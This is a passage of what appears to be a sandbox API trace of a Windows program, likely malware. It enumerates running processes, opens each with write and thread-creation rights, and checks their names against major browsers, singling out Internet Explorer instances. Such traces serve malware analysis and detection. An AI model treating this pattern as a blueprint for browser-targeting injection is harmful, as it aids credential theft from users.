	[0216.545] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0216.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.545] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.546] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0216.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.546] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.546] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0216.547] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x48c8
	[0216.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.547] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0216.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.547] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.548] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0216.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.548] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.548] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0216.549] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x48cc
	[0216.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.549] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0216.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.549] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.549] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0216.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.550] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.550] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0216.551] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x48d0
	[0216.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.551] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0216.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.551] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.552] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0216.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.552] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.553] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0216.553] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x48d4
	[0216.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.554] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0216.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.554] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.554] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0216.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.554] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.554] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0216.555] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x48d8
	[0216.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.555] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0216.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.556] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.556] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0216.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.557] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.557] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0216.558] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x48dc
	[0216.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.558] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0216.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.558] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.559] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0216.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.559] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.559] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0216.560] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x48e0
	[0216.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.560] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0216.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.561] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.561] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0216.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.561] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.561] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0216.562] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x48e4
	[0216.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.562] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0216.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.562] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.563] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0216.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.563] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.563] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0216.564] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x48e8
	[0216.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.564] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0216.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.564] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.565] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0216.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.565] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.565] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0216.566] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x48ec
	[0216.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.566] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0216.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.567] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.567] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0216.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.568] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.568] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0216.569] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x48f0
	[0216.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.569] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0216.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.570] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.570] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0216.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.571] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.571] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0216.572] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x48f4
	[0216.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.572] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0216.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.572] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.573] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0216.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.574] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.574] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0216.575] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x48f8
	[0216.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.575] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0216.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.576] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.576] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0216.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.577] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.577] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0216.578] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x48fc
	[0216.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.578] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0216.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.578] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0216.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.578] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0216.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.579] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.579] NtQueryInformationProcess (in: ProcessHandle=0x48fc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0216.579] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0216.579] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0216.580] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x4900
	[0216.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.580] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0216.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.581] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0216.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.581] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0216.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.582] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.582] NtQueryInformationProcess (in: ProcessHandle=0x4900, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0216.582] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0216.582] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0216.583] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x4904
	[0216.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.583] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0216.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.584] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.584] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0216.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.584] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.584] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0216.585] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x4908
	[0216.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.585] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0216.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.585] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.586] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0216.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.586] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.586] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.587] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x490c
	[0216.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.587] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.587] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.588] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.588] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.588] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.589] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.590] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x4910
	[0216.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.590] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.590] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.590] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.591] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.591] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0216.591] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x468) returned 0x4914
	[0216.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.592] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.592] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.592] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.593] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.593] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.593] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x4918
	[0216.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.594] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.594] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.594] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.595] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.595] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0216.595] CloseHandle (hObject=0x188) returned 1
	[0216.595] Sleep (dwMilliseconds=0x64) 
	[0216.685] GetCurrentProcessId () returned 0x110
	[0216.686] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0216.690] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0216.692] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0216.693] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0216.694] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x491c
	[0216.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.695] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0216.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.695] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.696] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0216.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.696] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.697] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0216.698] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x4920
